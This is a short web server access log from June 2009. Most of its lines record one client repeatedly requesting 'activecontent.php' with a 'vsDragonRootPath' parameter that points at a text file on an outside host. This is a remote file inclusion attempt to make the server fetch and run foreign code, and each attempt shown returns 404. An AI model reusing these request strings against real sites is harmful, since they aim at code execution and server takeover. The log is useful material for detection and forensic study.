199.120.90.222 - - [16/Jun/2009:02:12:33 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:33 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:34 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:34 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:34 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:13:04 -0400] "GET /logs/access_log.Q109060400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:13:04 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
63.87.133.199 - - [16/Jun/2009:02:13:08 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
199.120.90.222 - - [16/Jun/2009:02:13:12 -0400] "GET /logs/access_log.Q109060400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
